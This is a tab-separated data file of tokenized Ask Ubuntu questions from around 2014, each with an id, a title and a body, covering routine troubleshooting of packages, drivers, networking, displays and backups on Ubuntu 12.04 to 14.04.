465569	can not install eclipse in ubuntu 14.04 64-bit	i can not install eclipse from the ubuntu software center . i get error : the following packages are not yet satisfied with dependencies : eclipse-platform : depends : eclipse-platform-data ( > = 3.8.1-4 ) but 3.8.1-4 is installed depends : eclipse-rcp ( = 3.8.1-4 ) but 3.8.1-4 is installed depends : liblucene2-java ( < 2.9.5 ) but 2.9.4 + ds1-4 will be installed depends : sat4j ( < 2.4.0 ) but 2.3.2-1 is installed . thanks to everyone for your help !
465572	keyboard only works when mouse moves	version - ubuntu 14.04 ( also tried 13.10 and 12.10 ) machine - lenovo r61e ( laptop ) i have been unable to determine what the problem is and i 'm really hoping someone here has some suggestions . scenario : ( in any text-input or word program ) i press a key on the built-in keyboard nothing happens for a period of time after a delay , the key will input repeatedly , as if stuck or held down i move the mouse and it stops i press a key and then immediately move the mouse the key will input properly without repeating , but only after the mouse movement i plug in a usb ( or wireless ) keyboard keyboard inputs properly ; no problems i am stuck between thinking this is a hardware issue ( which i doubt , due to no issues previously on windows xp ) and a driver issue ( which i have no idea how to troubleshoot ) . does this make sense to anyone else ? anything i can try to help narrow down the problem ?
465575	.sh installation error , this script is to be run as resolve user	ubuntu 14.04 64 bit . i downloaded a .sh file that is supposed to install davinci resolve but when i run it it says uncompressing installation package , and then says this script is supposed to be run as the resolve user . please login as the resolve user and run this script again . i have no idea what i am supposed to login to . i am not very experienced with ubuntu . davinci resolve is a video editing software , this is where i downloaded it http : //goo.gl/09wcz3
465578	how do i hook up my ipod with itunes ?	i have a apple ipod 30gb . i need to run it on lubuntu 14.04 with full functionallity . can i run itunes on lubuntu 14.04 . if so , how ?
465581	hp compaq tc4200 problems	i have a hp compaq tc4200 and the headphone jack does n't work it acts like nothing 's plugged in . i 've tried any solution i could find and most did nothing at all at best and some forced me to re-install ubuntu . i 'm running 14.04 currently , the other issue is there is a button on the side that i used to use to disable the touchpad but upgrading to 14.04 it seems i 've lost that setting somewhere . i ran xev -- event keyboard and it gave the following results when i pressed the button . keypress event , serial 28 , synthetic no , window 0x4200001 , root 0x80 , subw 0x0 , time 28730704 , ( -94,220 ) , root : ( 366,265 ) , state 0x10 , keycode 146 ( keysym 0xff6a , help ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 28 , synthetic no , window 0x4200001 , root 0x80 , subw 0x0 , time 28731138 , ( -94,220 ) , root : ( 366,265 ) , state 0x10 , keycode 146 ( keysym 0xff6a , help ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false i 'd like to be able to press this button to disable my synaptics touchpad please ? as for the headphone jack i really do n't know , i 'm at my wits end with this , and to add insult to injury the built in speaker ( s ) is terrible . anyone who can help with either of my problems would really be a boon to me . thank you very much .
465585	encryption of hard disk	is it possible to encrypt the hard disk without formatting in ubuntu . if yes so , please tell me with full description .
465586	how to reset external protocol handler in chrome ?	a while back i selected `` do nothing '' when chrome asked me how to handle a specific url . now i want chrome to launch xdg-open , which again can launch the correct application , but i ca n't figure out how to undo my `` do nothing '' selection . any ideas ? thanks !
465590	plenty free inodes yet can not write to disk	i have a 1tb ext4 ssd mounted as data drive on ubuntu server 12.04 . i use it to store files and noticed that @ 55 % use i can not add any new files/folders ( get 'no space left on device ' error message ) . one possibility is that there are no free inodes but then tune2fs shows that that there are still 58613749 free inodes ( out of 58613760 ) . there are at least few million files installed on this drive and i do n't understand why there have not taken appropriate amount inodes . is it possible for these stats to be inaccurate ? if they are accurate not sure how ) what else could cause the full disk behavior besides inodes ? any insights and ideas are appreciated . tune2fs output : filesystem flags : signed_directory_hash default mount options : user_xattr acl filesystem state : clean errors behavior : continue filesystem os type : linux inode count : 58613760 block count : 234422870 reserved block count : 11721143 free blocks : 230692951 free inodes : 58613749 first block : 0 block size : 4096 fragment size : 4096 reserved gdt blocks : 968 blocks per group : 32768 fragments per group : 32768 inodes per group : 8192 inode blocks per group : 512 flex block group size : 16 filesystem created : mon mar 24 00:21:23 2014 last mount time : mon mar 24 00:26:29 2014 last write time : mon mar 24 00:26:29 2014 mount count : 1 maximum mount count : -1 last checked : mon mar 24 00:21:23 2014 check interval : 0 ( < none > ) lifetime writes : 134 mb reserved blocks uid : 0 ( user root ) reserved blocks gid : 0 ( group root ) first inode : 11 inode size : 256 required extra isize : 28 desired extra isize : 28 journal inode : 8 default directory hash : half_md4 directory hash seed : 73ef2ab5-f6d4-4515-8abd-2fe94905901b journal backup : inode blocks df -i output : filesystem inodes iused ifree iuse % mounted on /dev/sdb1 58613760 58613760 0 100 % /media/data
465595	sharing of files between ubuntu 14.04 and vmware windows 7	i am unable to share files between ubuntu 14.04 lts ( host ) and windows 7 ( vmware guest ) . i tried all the possible options of defining the shared folders in vmware as mentioned in their site and all sorts . solution is highly appreciated .
465598	permissions to copy , move , save , save as , etc in ubuntu 14.04 lts	i 'm very sure this is probably a duplicate question , and/or is going to be taken as me asking for root privileges or whatever and just about everyone is going to say `` ... shouldnt do it ... '' or something of the sort . that being said , i am a web developer , i have ubuntu 14.04 lts on my laptop , it runs very nicely with the exception of one thing . i am not allowed to save or do anything i need to be able to do for my work . and , frankly , i do n't want to go into the terminal every time i want to save my work , would become very redundant when i should be able to just hit the save button and it work like it is suppose to . so , my question is , how can i give myself the permission to do the basic stuff that i should be able to already do right from the start ? i did notice that if i right click on a folder and go to permissions it has everything grayed out saying i do n't have permission/am not the owner . i feel this is completely stupid , i should be able to do whatever i want inside of folders . for example , the program brackets i will sometimes use to test out code and what-not , i am not allowed to save or anything , why ? ! ? it is not going to harm ubuntu or my laptop if i do , so why am i not set as the owner ? a real , actual answer and not just a work-around would be nice .
465600	xubuntu 14.04 - full-disk encryption and lvm during installation ?	does xubuntu 14.04 also support full-disk encryption and lvm during installation like ubuntu ?
465602	compiz wobbly issue after upgrade to 14.04 64bit	i upgraded to 14.04 64 bit . the issue is , when i switch ( alt+tab ) from google chrome to another application ( say file manager ) , chrome shakes in the background . this happens only when i do ( unmaximize+maximize ) to google chrome . when chrome is started in maximized state only , this does n't happen . this is caused by some issues with wobbly+compiz , i guess . video recording is here .
465607	lubuntu 14.04 screen switching off	i recently installed lubuntu 14.04 on my asus eeepc 1015pem and set up everything i needed and its working just the way i want except for one thing my screen keeps switching after about 20 mins or so , here is what i 've done and the problem still presists : set monitor options in power preferences to never sleep/switch off for both battery and ac in light screen locker settings i have bother blank and sleep set to never . this wouldnt be a huge issue for me but i watch alot of tv shows and anime and its sucks having the screen switch off in the middle of an episode .
465611	kubuntu upgrade in ubuntu studio environment	i run ubuntu studio session 13.10 on kubuntu . it got upgraded automatically to xfce . i want to update my kubuntu 13.10 to 14.04 . how can i do that ?
465615	access ubuntu from xp by remote desktop	i want to access 14.04 via remote desktop from xp . i installed vnc4server on my 14.04 system following this guide . now what to do afterwards ? do i need to install some thing on xp ? vnc client for xp ? maybe i can follow this question . all i need is to access the 14.04 desktop from xp . so if there is a solution , please just tell me : what i need to install on 14.04 , and what i need to install on xp .
465619	wifi/internet access - nm-tool disconnected ... proprietary driver did n't take	having trouble getting wifi to work . now having trouble getting ethernet ( internet connection , line ) to work . connected via ethernet to try and get wifi to work and found out i needed to install a proprietary driver . i went to software & updates , saw the broadcom driver , chose the option for it , to apply changes . the wifi did n't come up after it looked like it was loading the proprietary driver . so i shut the machine down and unplugged the ethernet line . when i turned it back on neither the wifi or ethernet ( the internet connection ) are working . the nm-tool reads state : disconnected . lspci gives the same as before . lots of info including the broadcom ethernet and network controller info . any suggestions on what to try next ? should i re-install ? very , very , sorry . am super new . this is my very first ubuntu load of any flavor . using 14.04 lts any ideas , directions , would be greatly appreciated .
465621	libreoffice-writer : can i add shortcut-key for special characters ?	in ms-office-word shortcut-key for special characters can be applied as following : but now i am using libre-office which is pre-installed with ubuntu ! and want to put shortcut-key for special characters . but there is not such option available : it is difficult for me to write every-time with unicode ctrl+uthen055thenenter ( 0055 is only example for u which is not special-character ) . thus , help me to add shortcut-key or any other method as i am leaving ms-office and working with libre-office version : 4.2.3.3 ( open-source and pre-installed with ubuntu 14.04 )
465625	trouble with ubuntu 14.04 after trying to put gnome3	so everything started when i decided that i want to spice up how my desktop looked . i have been told that gnome > unity so i decided to try it out . i referred to this website and followed the following instructions : open terminal and run this commands sudo apt-get update & & sudo apt-get install gnome-shell ubuntu-gnome-desktop tl ; dr : since i typed the above commands , a lot of things have been going wrong with my computer . what is going on ? is there a way i can still salvage my attempt to getting gnome 3 ? if not , how do i go back to unity ? afterwards , i did not notice a change , so i rebooted my computer to see if the effects would take place . the first thing i noticed was the booting process : rather than showing the ubuntu logo , it showed some foot logo which i presume is the gnome logo . then i was given the option to log in , which i did . it took a bit longer than usual , but excited i was for the new eye-candy i was expecting for the future . what i got instead was the same basic framework for the display with only changes in the design . i could not change my wallpaper nor anything major in my display ( even with tweak-tools ) . what really worried me was the terminal commands . i figured that i would need to update and upgrade my cpu to get all of the fancy stuff , but what i got instead was the following message : input sudo apt-get update output e : gpg error : http : //extras.ubuntu.com trusty inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) sometimes my update would work and sometimes it would not ( i would have to reboot many times ) . i figured that all of this was too much for eye-candy so i decided to just get rid of what i downloaded . i typed the following command sudo apt-get purge gnome-shell ubuntu-gnome-desktop and i rebooted . absolutely no change . to make sure nothing would be too messed up from the purging , i re-installed it . anyways , now that you guys have the backstory , i have the following questions : -what is going on with my computer ? -is there still hope for me to correctly have gnome3 on my computer ? -if not , how can i get back to unity which came with my ubuntu 14.04 ? i just do n't want to backing up all of my files and reinstalling ubuntu 14.04 . thank you !
465626	vga on board driver problem	after installation of ubuntu 14.04 everything is very slow . i have biostar k8m800 micro am2 motherboard . apparently not loaded graphic driver for vga on board . please help .
465627	desktop icons off screen	i have a three monitor setup , where the left monitor is positioned lower than the other two . i want to setup the monitor layout accordingly , but when i do that , some of the desktop icons are not appearing ... it looks like the icons are put on the top left of the x screen , regardless of the layout of the monitors ... how can this be solved ? see this image : where the black-yellow blocks are the icons , so the first two are off screen and the third partially ... even re-organizing the desktop icons will not solve it ...
465628	my prolific technology , inc. pl2303 serial port adapter does n't work in either ubuntu 13:10 or 14:04	i have a usb to serial port adaptor , prolific technology , inc. pl2303 serial port which works on ubuntu 10.04 , and win xp , win7 machines . however , i have problems with it on ubuntu 13.10 and 14.04 lts . it enumerates ok and shows up as /dev/ttyusb0 or /dev/ttyusb1 . currently i am trying to connect to a cheap rs232 multimeter which connects to pin 2 ( rx data ) and the pin 4 ( dtr ) line . 1 . ) does anybody know whether the usb-serial drivers for pl2303 work or are broken ? if they are ok , then 2 . ) does anyone know how to set or reset the dtr line ? this is used to enable or suppress the output from the multimeter . currently using tcl/tk for accessing hardware .
465633	ssh authorized_keys : configuring single public key for multipl hosts	how to use single public key for multiple hosts do i need to duplicate the entries in authorized_keys ? or is there a way to do it as single configuration ? for example : key user @ host1 user @ host2 user @ host3
465634	ubuntu 14.04 lts desktop manager	how do i activate the desktop manager ? i 'm getting the error message `` desktop manager inactive '' after installing , then removing cairo . when looking for alternative desktop pictures , i installed something called `` cairo '' or maybe `` cairo desktop '' . i did n't like the way it took over the desktop so i tried to uninstall it , but this did n't work . eventually i ran `` purge '' in terminal , i do n't have the details . i got rid of the nuisance program , with all the buttons at the bottom of the screen , but an icon `` cairo-dock '' remains . now when i try to install alternative `` desktop '' programs , i get the error message `` desktop manager inactive '' and the install fails . sorry if i 'm using windows terms , relatively new to linux . should i re-install gnome ?
465635	how to setup an ubuntu vm running in windows azure to be connected to via ssh from 2 or more computers	i have an ubuntu vm hosted on azure . when creating the vm , i was prompted to add a pem ssh key for authentication when i want to ssh to the vm . however , how do i set up this vm so that my other colleagues can also ssh to it from their own computers ?
465636	how to force xnview to use qtcurve widget style ?	i have installed xnview mp from http : //ppa.launchpad.net/dhor/myway/ubuntu i can not make it to use qtcurve as all my other qt/kde applications : this does n't help : xnview -style qtcurve
465638	how to change the name of localhost to custom name which is available to other users in lan	i need to use the custom url name which is able to access from all devices in lan . i know that it can be changed from the /etc/hosts file 127.0.0.1 myname 127.0.1.1 system09-system-product-name # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters while entering the myname hosts it is available to access myname/urlpath . it is accessible only for my system . how can i make this available to access from other system in lan too ? update : 127.0.0.1 allau 192.168.1.16 sul 127.0.1.1 system09-system-product-name # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
465639	an unresolvable problem occurred while initializing the package information	e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-i386_packages , e : the package lists or status file could not be parsed or opened
465646	swap partition on ssd with full encryption	i installed ubuntu 14.04 on my laptops ssd with full encryption enabled on installation and i just realized , that the installer created a swap partition . swapon shows me filename type size used priority /dev/mapper/ubuntu -- vg-swap_1 partition 8065020 208 -1 as far as i know , for suspend-to-disk these 8gb are needed since i have 8gb ram . however , i 've often read , that swap partitions should be used with caution when placed on an ssd . so do i have to mind this at all ( and maybe delete the partition or change some settings ) or is this just `` okay '' ?
465647	change the language of the home/user/ folders automatically	when i changed my language/locale settings , a window popped up asking me if i wanted to rename documents , music , video , downloads , to the new language . i was worried that this might be some irreversible operation and said no and ticked the do n't ask me again box . now i want the system to change the folders name automatically when i switch to another language automatically . is there a way to do this ? or to make the popping window appear again ? thanks .
465648	how do i get my unity login screen back after installing lubuntu desktop on 14.04 ?	i have installed lubuntu-desktop and xfce4 on a ubuntu 14.04 installation . after doing so , my login screen changed . i have tried resetting my lightdm and attempted to modify the lightdm file , where nothing appears . thank you , droid
465650	help , locked out of my computer	well , i screwed up my installation of ubuntu again , got the thousandth time , and i was hoping someone could help me out . basically , i altered the xorg configuration file , which seems to be clashing with the synaptic file . anyway , i 'm stuck on the boot screen , where it says ubuntu , and i really just need to remove that file . so i 'm wondering if it would be possible to access terminal while booting up . is there anyway to access terminal from this boot screen ? i 've tried ctrl+alt+f1 , but to no avail .
465651	rsync - memory usage	i am running on xubuntu 14.04 and experiencing high memory usage of rsync . with a fresh start , the system is ok . i have rsync running in a cronjob , after/during rsync memory usage increases and stays high ( seems like rsync is not freeing the memory ) . any hints/suggestions/etc ? ? ? rsync-command : sudo rsync -auaxv -- delete -- ignore-errors /* /media/edisz/backup_hdd/ -- exclude= { /dev/* , /proc/* , /sys/* , /tmp/* , /run/* , /mnt/* , /media/* , /lost+found } here 's the htop output ( after rsync ) : and free -m total used free shared buffers cached mem : 3816 3386 429 19 230 1000 -/+ buffers/cache : 2155 1660 swap : 3954 0 3954 ok , firefox is eating ~400mb , but then there are st ill 1700mb left ... and before rsync : total used free shared buffers cached mem : 3816 1497 2318 39 71 731 -/+ buffers/cache : 694 3121 swap : 3954 0 3954
465654	fire fox can connect to wifi but terminal ca n't for my college 's network settings	i 'm quite new to ubuntu so please be precise . in my college , i 've specific wi-fi settings with username and password , as well as lan settings with proxy server . in my network settings and in the preference of firefox , i 've given the desired settings and so my wi-fi works , but my terminal ca n't connect to wifi . i tried yum install and even ping www.google.com in my terminal but yet it ca n't connect . but when i open the ubuntu repository ( http : //in.archive.ubuntu.com/ ) in my firefox browser it opens up the webpage . so how can i get around this problem ? my college 's itadmin staff wo n't help with this problem . so how shall i configure my terminal to connect to the internet ? at my house , where i do n't have this settings , there the terminal connects to the internet . after i do export | grep proxy i get the output as declare -x ftp_proxy= '' http : //myusername : password @ 10.30.1.252:8080 '' declare -x http_proxy= '' http : //myusername : password @ 10.30.1.252:8080 '' declare -x https_proxy= '' http : //myusername : password @ 10.30.1.252:8080 '' and if i do wget www.google.com i get the output as -- 2014-05-15 11:09:12 -- http : //www.google.com/ connecting to 10.30.1.252:8080 ... connected . proxy request sent , awaiting response ... 407 proxy authentication required ( forefront tmg requires authorization to fulfill the request . access to the web proxy filter is denied. ) 2014-05-15 11:09:12 error 407 : proxy authentication required ( forefront tmg requires authorization to fulfill the request . access to the web proxy filter is denied . ) . please help ! !
465659	which file explorer has mercurial support ?	i know nautilus has support for mercurial , but i 'm not seeing the icon overlays even after installing tortoisehg-nautilus on ubuntu 14.04 . i 'm interested in knowing which linux file explorers ( both gui and terminal curses ) have support for mercurial ? that is , if i look at the files and directories in the file explorer , i should be able to quickly see which of them are not in the repository , which are modified and which are up to date .
465661	how to see what was updated in last update	recently i downloaded automatic updates which ubuntu offered me automatically ( classic `` confirm , confirm , ok ... done '' without actually reading what is being installed ) i feel like that as result of that i can not read properly questions from ux site in firefox how do i check what was updated in the last update i confirmed ?
465663	tracking active time gnome session	for my job i want to track the time i am actually working on my computer . therefore , i am wondering how it is possible to track the time i am logged in in gnome but not locked the screen . does anyone know if there is either a program or script for this purpose . alternatively , it would also help , if somebody could point me to hooks for login , logout , lock screen , unlock screen , which i could use in order log the times of these events into a file . thanks in advance , arnd
465665	change back to old lock-screen ubuntu 14.04	the new unity lock-screen now crashed thrice at my system - completely locking me out as a result . also unlocking the new lockscreen in terminal was not working , when it had already crashed . being crashed meaning , having no password field and statusbar , just the wallpaper with dots on it , not reacting to anything at all . how do i change back to the old lock-screen ( or any other working lock-screen ) ? there was a possibility using compiz manager but it was removed in the last update ... i know the old lock-screen is still there because if i lock my pc from a different terminal via commandline the old lockscreen is used . using the same command on my desktop the new lock-screen is used so does not solve my problem - else i would just make a script ...
465667	upgrage 13.10 to 14.04 is stucked in debconf	i am upgrading ubuntu 13.10 to 14.04 lts . during upgrade a popup come and message is `` what do you want to do about configuration file php.ini ? `` then i select `` start a new shell to examine the situation '' . press `` forward '' button . after that upgrade process look like stoped . if i write command in terminal `` sudo apt-get update '' it returns e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
465669	e : unable to parse package	when i do an apt-get update , i get this message at the end : e : unable to parse package file /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty_universe_i18n_translation-en ( 1 ) e : problem opening /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-updates_main_binary-amd64_packages e : the package lists or status file could not be parsed or opened . originally , the problem referring to `` translation '' was n't showing , it was only the one referring to `` amd64 packages '' . so i did a little web surfing and came across a possible solution . i did this : sudo rm /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_trusty-updates_main_binary-amd64_packages and after than the `` translation '' errors came . help ?
465673	why is that my ubuntu clock is not working during the time i put in sleep mode	when i set time in ubuntu it 's working fine , but soon after putting in sleep mode , it 's not working . let 's say the time is 3:00pm and i suspended the laptop for 2 hours . it 's now 5:00pm but when the laptop resumes it says it 's still 3:00pm . after another 10 minutes it will show the time 3:10pm .
465674	how to check if unity web apps for gmail ( or other ) is installed ?	i 'm trying to integrate gmail with my ubuntu desktop , recently upgraded to version 14.04 , but i do n't remember if i have previously accepted to integrate gmail with the desktop . how can i check this ? i am not seeing any notification of new emails or anything in the task-bar or notification area , so does this mean it is not set up , or it is not working , or it is not configured or whatever . is there any unified configuration for the unity web apps ? just want to emphasize the last part of the question , regarding configuration of web apps . is it possible to configure the functionality of the unity web apps ? i see that gmail is showing a mail-icon in the notification-area on incoming mail , when the gmail-webapp is running . so how can i configure web apps behavior in unity ?
465675	how can i check if a directory contains packaged files ?	i 've just run into a bug . somewhere while scrobbling round with sudo pip , i appear to have knackered my dist-packages . the suggested workaround is to [ re ] move /usr/local/lib/python2.7/dist-packages and start again . i 've had a look in the directory and it 's pretty massive . years of abuse . i 'm happy enough reinstalling everything with pip but i do n't want to delete and then overwrite a load of packaged paths . in my experience , that 's a recipe for agony . i know we 're talking about a /usr/local/ directory here . these should be non-packaged files but i would like to make double-sure ... and this might apply to other people who are in similar predicaments . so is there a quick way i can list what packages a directory contains ?
465683	wan failover using eth0 and wlan0	i need to create a failover using wifi - connected to wireless 3g modem and lan connected to adsl router when the adsl goes down it needs to failover to the 3g on wlan0 i 've tried many scripts online and nothing works , please send me the correct script i 'll need . ps : i need to check for hosts such as www.google.com , the failover wont be of any use if it only fails over after physically unplugging the eth cable . it must fail over if i unplug the telephone line on the router
465689	386iso or amd iso	i have an intel i3 machine running windows 7 64 bit on which i want to run ubuntu in parallel . which 14.04 iso may i use for installation ? the 64 bit amd iso or 386 iso 32bit wulf
465690	piping with moreutils ts	i have an incoming stream at a serial port , with new lines appearing about once per second wren @ raven : ~ $ cat /dev/ttyusb0 a_sensor1 , b_22.00 , c_50.00 a_sensor1 , b_22.00 , c_50.00 a_sensor1 , b_22.00 , c_50.00 a_sensor1 , b_22.00 , c_50.00 a_sensor1 , b_22.00 , c_50.00 i want to strip blank lines and timestamp the remainder . sed will cull blank lines and add a timestamp , but i ca n't make the timestamp update , it just reports the time it was invoked : wren @ raven : ~ $ cat /dev/ttyusb0 | sed -e '/^ $ /d ' -e `` s/ $ /`date +\ , % f\ , % t`/ '' a_sensor1 , b_22.00 , c_50.00,2014-05-14,09:44:42 a_sensor1 , b_22.00 , c_50.00,2014-05-14,09:44:42 a_sensor1 , b_22.00 , c_50.00,2014-05-14,09:44:42 a_sensor1 , b_22.00 , c_50.00,2014-05-14,09:44:42 a_sensor1 , b_22.00 , c_50.00,2014-05-14,09:44:42 a_sensor1 , b_22.00 , c_50.00,2014-05-14,09:44:42 a_sensor1 , b_22.00 , c_50.00,2014-05-14,09:44:42 ^c i 've found ts , part of moreutils , and can pipe into it to get an updating timestamp . wren @ raven : ~ $ cat /dev/ttyusb0 | ts may 14 09:49:26 a_sensor1 , b_22.00 , c_50.00 may 14 09:49:26 may 14 09:49:27 a_sensor1 , b_22.00 , c_50.00 ^c however , i ca n't properly combine ts with sed . this , which looks like it should do what i want , produces no output at all wren @ raven : ~ $ cat /dev/ttyusb0 | sed -e '/^ $ /d ' | ts ^c wren @ raven : ~ $ however reversing the order of the pipes does produce an output , but of course does n't strip lines which are no longer blank . other substitutions work fine , so i know the pipe to sed is working . wren @ raven : ~ $ cat /dev/ttyusb0 | ts | sed -e '/^ $ /d' may 14 10:07:25 a_sensor1 , b_22.00 , c_50.00 may 14 10:07:25 may 14 10:07:26 a_sensor1 , b_22.00 , c_50.00 may 14 10:07:26 ^c so i 'm a bit baffled . i can presumably make sed remove the unwanted lines , but timestamping them prior to removal must be the wrong approach . i would appreciate an explanation and some help .
465695	lost audio after upgrading from 13.10 to 14.04	after the upgrade i 've lost the audio output immediately : no hardware change ! with kubuntu 14.04 kernel 3.13.0-24-generic ( # 47-ubuntu smp fri may 2 23:31:42 utc 2014 ) - the audio does n't work at all . all my alsa information is located at http : //www.alsa-project.org/db/ ? f=9fb68b073380ba8bb16213bef8843b2a6bf54557 the audio drive seems correctly loaded but it does n't work .
465698	constant interrutions in very slow wifi brcmfmac43241b4-sdio in vaio pro 13	my wifi works but is very slow and i have constant interruptions . i get in /var/log/syslog kernel : [ 2125.408367 ] brcmfmac : brcmf_escan_timeout : timer expired nm-tool : nm-tool networkmanager tool state : connected ( global ) device : wlan0 [ hnet ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : brcmfmac_sdio state : connected default : yes hw address : xxxxxxxxxxx ( hidden ) capabilities : speed : 11 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *hnet : infra , xxxxxxxxxxxxxxxxxx , freq 2437 mhz , rate 54 mb/s , strength 39 zwglbdata : infra , xxxxxxxxxxxxxxxxx , freq 2437 mhz , rate 54 mb/s , strength 30 wpa wpa2 enterprise ipv4 settings : address : 10.1.82.179 prefix : 19 ( 255.255.224.0 ) gateway : 10.1.64.1 dns : 10.1.64.1 can somebody help ?
465700	enable numlock at login screen - with thin client ?	i want to enable numlock at the login screen . numlockx is already installed . i 've tried adding `` greeter-setup-script=/usr/bin/numlockx on '' to etc/lightdm/lightdm.conf , which by the way only works if it 's in the [ seatdefaults ] section ( there appears to be an [ xdmcpserver ] section as well ) . but then , numlock only works for the main computer while my thin client blacks out ( no login screen or any screen at all ) . what 's wrong ? here 's my etc/lightdm/lightdm.conf : [ seatdefaults ] greeter-setup-script=/usr/bin/numlockx on greeter-session=unity-greeter user-session=ubuntu [ xdmcpserver ] enabled=true port=177 my thin client is an ncomputing l300 with vspace server 3.2.2.8 , running on ubuntu 12.04.04 . i can not upgrade to 14.04 because the vspace software does n't support that yet . thanks for helping me out .
465701	how to replace ubuntu with windows 8.1 ?	i want to get windows 8.1 back because with ubuntu you have to run like almost every app with the terminal and windows 8.1 is more user friendly . i have tried to boot from usb but after like 2 minutes it will boot ubuntu and when i try to install windows 8.1 from ubuntu using the files in my usb i ca n't because ubuntu does n't support .exe files
465702	intel graphics hd4000 fails to work	this question may be marked as duplicate but questions i 've found alike in askubuntu stackoverflow ubuntuforum can not solve this problem or give me an answer . the model of my laptop is acer v7-481 which comes with an i3-3227u cpu and no graphic card . when i was installing ubuntu 12.04 for the first time , the laptop booted up in a black screen the only solution to this is to add a boot parameter nomodeset or something to disable the kms . other solutions i found are useless , including acpi related and adjust the backlight using shortcuts etc . now , my laptop can only boot with nomodeset but i do n't think the integrated graphic card is functioning normally . i can not connect to a second monitor via hdmi and display port unity is running in 2d mode ca n't use 3d hardware acceleration out put of uname -a linux v7 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux out put of lshw -c video *-display unclaimed description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list configuration : latency=0 resources : memory : c0000000-c03fffff memory : b0000000-bfffffff ioport:3000 ( size=64 )
465703	how to install revkit	i’m trying to install a software called revkit on ubuntu 12.10 and the following instructions1 need to be followed : revkit can be downloaded from the www.revkit.org website . opening a bash shell and assuming that the file revkit-1.3.tar.gz is in the current working directory , first the package needs to be unpacked : tar xvfz revkit−1.3.tar . gz cd revkit−1.3 then , you can build the toolkit . the build process is divided into two scripts . first , the revkit environment is created using the bootstrap script . afterwards , the revkit algorithms are built using the build script . this has the benefit of running the second script only if changes have been made on the algorithms but not on the environment . the bootstrap script should only be called once at the beginning . more precisely , first run the bootstrap script : ./make.py bootstrap this will download and compile all dependencies automatically . for that purpose , compiling boost takes some time . if you already have installed boost using the distribution’s package manager , the option -dboost path can be used to specify its path , e.g . -dboost path=/usr . alternatively you can specify the boost include and libs path separately by using –boost , –boost-include-dir and –boost-lib-dir as arguments . please make sure that your version of boost satisfies the requirements . after bootstrapping the environment , the build script needs to be executed . to run this script manually call : ./make.py build this will build the whole revkit suite including the core , algorithms , examples , and the python bindings . the python bindings enable the cli to use revkit like a shell . if the system can not build the python bindings or if they are not needed , they can be deactivated by calling : ./make.py build −dbuild bindings=off instead . further packages which are not available in the distribution’s package manager ( e.g . cudd or puma ) are downloaded and installed automatically from the bootstrap script . boost is also required and will be downloaded and installed by default . the build script must be called at least once . afterwards , the sources only need to be compiled again if local changes have been performed . alternatively , the program make can be executed manually by calling : make in the build directory . the build script also provides the options of enabling and disabling the compilation of unstable and example algorithms by using the parameters -dbuild unstable and -dbuild examples . if this is correct an gui window should open in the following instructions which am not able to see : 4.1 . revkit graphical user interface the revkit graphical user interface enables the creation and execution of customized design processes to be executed . therefore , a gui is utilized where the respective tasks can easily be put together by means of item blocks connected to a graph . each item performs an operation and may have ports for the respective input parameters and output results . input ports can be connected to output ports forming a channel when they support the same data types . in order to start the revkit graphical user interface , the following command has to be invoked from within the root directory of revkit : ./tools/gui/gui.py i was able to do the first 2 instructions , but after that i am unable to follow what has to be done , i.e . the instructions relating to the bootstrap script . can anyone tell me what exactly needs to be done ? basically i need to get to the gui interface which am unable to do 1revkit – user manual , 3 . download and installation
465704	dpkg `` missing version '' for libcgns2-dbg in /var/lib/dpkg/available â ca n't do update - how can i fix this ?	dpkg : warning : parsing file '/var/lib/dpkg/available ' near line 839085 package 'libcgns2-dbg ' : missing description dpkg : error : parsing file '/var/lib/dpkg/available ' near line 839085 package 'libcgns2-dbg ' : missing version error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 2 ) this message i got after failure of installation of updates . what should i do ?
465711	dbus error on 14.04 after system is left idle for a few hours	i did a clean install of 14.04 on a crucial m4 64gb ssd . the system boots in less than 30 seconds now ! but.. when i leave it idle for a few hours and log back in nothing works .. if i do a simple command like df ..i get a dbus error message . i also have a toshiba sata disk mounted for general storage since the ssd is so small .. nothing appears to be damaged when i reboot but it is extremely annoying .. any ideas on how to correct this will be appreciated .
465715	my home ethernet is working and wifi is also work '' wired network - disconnected - you are now offline '' on ubuntu 12.04	my home ethernet is working and wifi is also working but in office ethernet shows `` wired network - disconnected - you are now offline '' on ubuntu 12.04 . i am new to ubuntu . please help me with it .
465716	ifconfig weirdly returns exit code 1	i am executing the following command to find the mac address of eth0 ifconfig eth0 | grep -o -e ' ( [ [ : xdigit : ] ] { 1,2 } : ) { 5 } [ [ : xdigit : ] ] { 1,2 } ' i have a java wrapper which just calls the script containing only the above command . if i run the java code it works fine with the above command executing successfully and outputting the mac address . the problem is when it is run under tomcat the process executing the script sometime exits with exitcode 1 and output contains blank value . weird as it may sound but restarting the tomcat service and then trying to execute the script works fine giving the proper mac address . but later again it starts giving the same problem . what is the possible solution for this ? let me know if you want more information .
